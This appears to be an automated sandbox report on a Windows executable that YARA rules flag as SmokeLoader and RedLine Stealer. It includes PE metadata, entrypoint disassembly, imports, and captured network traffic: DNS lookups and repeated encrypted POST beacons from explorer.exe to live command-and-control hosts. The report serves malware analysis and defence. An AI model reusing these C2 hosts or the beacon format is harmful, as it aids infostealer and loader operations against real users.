                      SHA512:a50e57bb3a54f491f303d928c5b4224dfe6ab89d63589b0f1a77cdcda808cad35703483fe9420d2074ba4e0a780193a38b7ae23c8f9ee5dad451805c35027dc3
                      SSDEEP:6144:ojycY4PGQvQbgTBVpv3kbByoSg0RwwVfg:oVGgRTXpf+BTStRk
                      TLSH:D854CF3576A2C8BDD1A616304C25FFA06BBFBC31647085CB3764265E6E732809A7631F
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K^_.*0..*0..*0..x...*0..x..)*0...K..*0..*1.,*0..x...*0..x...*0..x...*0.Rich.*0.........................PE..L...x.2a...........
                      Icon Hash:8c8cbcccce8888e7
                      Entrypoint:0x407739
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6132C078 [Sat Sep 4 00:40:24 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:5f7126027ff537a60748c378e10145e6
                      Instruction
                      call 00007F3BD4BEA71Ch
                      jmp 00007F3BD4BE449Dh
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      mov ecx, dword ptr [esp+04h]
                      test ecx, 00000003h
                      je 00007F3BD4BE4646h
                      mov al, byte ptr [ecx]
                      add ecx, 01h
                      test al, al
                      je 00007F3BD4BE4670h
                      test ecx, 00000003h
                      jne 00007F3BD4BE4611h
                      add eax, 00000000h
                      lea esp, dword ptr [esp+00000000h]
                      lea esp, dword ptr [esp+00000000h]
                      mov eax, dword ptr [ecx]
                      mov edx, 7EFEFEFFh
                      add edx, eax
                      xor eax, FFFFFFFFh
                      xor eax, edx
                      add ecx, 04h
                      test eax, 81010100h
                      je 00007F3BD4BE460Ah
                      mov eax, dword ptr [ecx-04h]
                      test al, al
                      je 00007F3BD4BE4654h
                      test ah, ah
                      je 00007F3BD4BE4646h
                      test eax, 00FF0000h
                      je 00007F3BD4BE4635h
                      test eax, FF000000h
                      je 00007F3BD4BE4624h
                      jmp 00007F3BD4BE45EFh
                      lea eax, dword ptr [ecx-01h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      lea eax, dword ptr [ecx-02h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      lea eax, dword ptr [ecx-03h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      lea eax, dword ptr [ecx-04h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      cmp ecx, dword ptr [0042C770h]
                      jne 00007F3BD4BE4624h
                      rep ret
                      jmp 00007F3BD4BEA706h
                      push eax
                      push dword ptr fs:[00000000h]
                      lea eax, dword ptr [esp+0Ch]
                      sub esp, dword ptr [esp+0Ch]
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [eax], ebp
                      mov ebp, eax
                      Programming Language:
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [C++] VS2008 build 21022
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x17ea40x50.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000x1a0e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c0000xe0c.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x12300x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x52b00x40.text
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1dc.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x1798a0x17a00False0.5888206845238095data6.690204553747697IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x190000x172980x14c00False0.7701548381024096data6.902230084257738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x310000x1a0e00x1a200False0.630775269138756data6.520608323160902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x4c0000x1d6e0x1e00False0.40078125data3.9902482462929365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      AFX_DIALOG_LAYOUT0x493180xedataFrenchSwitzerland
                      KUNADOREHUMENANAMOVIZO0x46c680x2626ASCII text, with very long lines (9766), with no line terminatorsFrenchSwitzerland
                      SENUZEMIX0x463280x940ASCII text, with very long lines (2368), with no line terminatorsFrenchSwitzerland
                      RT_ICON0x318f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x327980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x330400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x355e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x366900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x36b480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x372100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x397b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x39c500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x3aaf80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x3b3a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x3ba680x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x3bfd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x3e5780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x3f6200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x3faf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x409980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x412400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x419080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GeorgianGeorgia
                      RT_ICON0x41e700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x444180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x454c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GeorgianGeorgia
                      RT_ICON0x45e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                      RT_DIALOG0x495180x78dataFrenchSwitzerland
                      RT_STRING0x495900x376dataFrenchSwitzerland
                      RT_STRING0x499080x4fcdataFrenchSwitzerland
                      RT_STRING0x49e080x3b8dataFrenchSwitzerland
                      RT_STRING0x4a1c00x4d2dataFrenchSwitzerland
                      RT_STRING0x4a6980x51cdataFrenchSwitzerland
                      RT_STRING0x4abb80x528dataFrenchSwitzerland
                      RT_ACCELERATOR0x492900x60dataFrenchSwitzerland
                      RT_ACCELERATOR0x492f00x28dataFrenchSwitzerland
                      RT_GROUP_ICON0x36af80x4cdataGeorgianGeorgia
                      RT_GROUP_ICON0x3fa880x68dataGeorgianGeorgia
                      RT_GROUP_ICON0x39c200x30dataGeorgianGeorgia
                      RT_GROUP_ICON0x462b00x76dataGeorgianGeorgia
                      RT_VERSION0x493280x1ecdataFrenchSwitzerland
                      DLLImport
                      KERNEL32.dllLoadLibraryA, GetModuleHandleA, InterlockedCompareExchange, OpenWaitableTimerA, CreateEventA, ReadConsoleInputW, WaitNamedPipeW, SetVolumeMountPointA, SetSystemTimeAdjustment, FindNextFileW, EnumResourceTypesA, GetModuleFileNameW, IsBadCodePtr, LoadLibraryW, DeleteFileW, SearchPathA, VirtualAlloc, WriteConsoleOutputCharacterW, GetConsoleAliasA, GetShortPathNameW, GetPrivateProfileStringW, PeekConsoleInputW, GlobalGetAtomNameA, GetProcAddress, GetUserDefaultLangID, GetConsoleAliasW, FindFirstChangeNotificationW, GetFileType, SetFileShortNameW, lstrcpynA, AddAtomW, SetConsoleCtrlHandler, CreateMutexA, GetLongPathNameA, FoldStringW, ResetEvent, GlobalWire, GetComputerNameA, GetVersionExW, GetSystemDefaultLCID, GetProcessHandleCount, GetLastError, VirtualProtect, GlobalAlloc, SetCalendarInfoW, SetComputerNameA, GetFileAttributesA, GetVolumePathNameW, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetCommandLineA, GetStartupInfoA, HeapAlloc, HeapFree, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, DeleteCriticalSection, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, SetFilePointer, ReadFile, GetConsoleCP, GetConsoleMode, CloseHandle, CreateFileA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEndOfFile, GetProcessHeap
                      ole32.dllOleQueryCreateFromData
                      WINHTTP.dllWinHttpCloseHandle
                      Language of compilation systemCountry where language is spokenMap
                      FrenchSwitzerland
                      GeorgianGeorgia
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 29, 2022 23:15:11.089168072 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:11.142709017 CEST8049704176.124.192.17192.168.2.3
                      Sep 29, 2022 23:15:11.142904043 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:11.144483089 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:11.144526005 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:11.421988964 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:11.734468937 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:12.343956947 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:13.547161102 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:14.750341892 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:15.953511953 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:18.360029936 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:18.423057079 CEST8049704176.124.192.17192.168.2.3
                      Sep 29, 2022 23:15:18.423149109 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:18.440016985 CEST4970480192.168.2.3176.124.192.17
                      Sep 29, 2022 23:15:18.493499994 CEST8049704176.124.192.17192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 29, 2022 23:15:10.759139061 CEST5784053192.168.2.38.8.8.8
                      Sep 29, 2022 23:15:11.085274935 CEST53578408.8.8.8192.168.2.3
                      Sep 29, 2022 23:15:18.474919081 CEST5799053192.168.2.38.8.8.8
                      Sep 29, 2022 23:15:19.506906986 CEST5799053192.168.2.38.8.8.8
                      Sep 29, 2022 23:15:20.997066021 CEST5799053192.168.2.38.8.8.8
                      Sep 29, 2022 23:15:22.502342939 CEST53579908.8.8.8192.168.2.3
                      Sep 29, 2022 23:15:23.531378031 CEST53579908.8.8.8192.168.2.3
                      Sep 29, 2022 23:15:25.035106897 CEST53579908.8.8.8192.168.2.3
                      TimestampSource IPDest IPChecksumCodeType
                      Sep 29, 2022 23:15:23.531533957 CEST192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                      Sep 29, 2022 23:15:25.035270929 CEST192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 29, 2022 23:15:10.759139061 CEST192.168.2.38.8.8.80x48a1Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                      Sep 29, 2022 23:15:18.474919081 CEST192.168.2.38.8.8.80x81b3Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      Sep 29, 2022 23:15:19.506906986 CEST192.168.2.38.8.8.80x81b3Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      Sep 29, 2022 23:15:20.997066021 CEST192.168.2.38.8.8.80x81b3Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 29, 2022 23:15:11.085274935 CEST8.8.8.8192.168.2.30x48a1No error (0)host-file-host6.com176.124.192.17A (IP address)IN (0x0001)false
                      Sep 29, 2022 23:15:22.502342939 CEST8.8.8.8192.168.2.30x81b3Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      Sep 29, 2022 23:15:23.531378031 CEST8.8.8.8192.168.2.30x81b3Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      Sep 29, 2022 23:15:25.035106897 CEST8.8.8.8192.168.2.30x81b3Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      • rleect.net
                        • host-file-host6.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349704176.124.192.1780C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Sep 29, 2022 23:15:11.144483089 CEST106OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Sep 29, 2022 23:15:11.144526005 CEST107OUTData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:11.421988964 CEST107OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:11.734468937 CEST108OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:12.343956947 CEST108OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:13.547161102 CEST109OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:14.750341892 CEST109OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:15.953511953 CEST110OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:18.360029936 CEST110OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://rleect.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 203
                      Host: host-file-host6.com
                      Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea
                      Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                      Sep 29, 2022 23:15:18.423057079 CEST110INHTTP/1.1 200 OK
                      Server: nginx/1.20.1
                      Date: Thu, 29 Sep 2022 21:15:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: fYour IP blocked0


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:23:13:48
                      Start date:29/09/2022
                      Path:C:\Users\user\Desktop\ikNC1JE7rY.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\ikNC1JE7rY.exe"
                      Imagebase:0x400000
                      File size:297472 bytes
                      MD5 hash:44F5530502DB25E5E66C15260EC4D25C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:10
                      Start time:23:14:20
                      Start date:29/09/2022
                      Path:C:\Users\user\Desktop\ikNC1JE7rY.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\ikNC1JE7rY.exe"
                      Imagebase:0x400000
                      File size:297472 bytes
                      MD5 hash:44F5530502DB25E5E66C15260EC4D25C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:11
                      Start time:23:14:25
                      Start date:29/09/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
